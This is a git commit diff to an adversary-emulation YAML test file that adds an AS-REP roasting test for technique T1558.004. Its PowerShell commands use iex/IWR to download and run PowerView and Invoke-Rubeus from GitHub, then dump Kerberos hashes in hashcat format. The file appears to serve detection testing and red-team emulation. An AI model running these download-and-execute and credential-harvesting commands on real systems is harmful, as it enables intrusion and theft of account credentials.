Update T1558.004.yaml (#1961)
PowerSharpPack - Kerberoasting Using Rubeus asreproast technique via function of WinPwn Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
@@ -56,4 +56,13 @@ atomic_tests:
|
||||
command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
|
||||
name: powershell
|
||||
name: powershell
|
||||
- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
|
||||
description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
|
||||
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
|
||||
name: powershell
|
||||
|
||||
Reference in New Issue
Block a user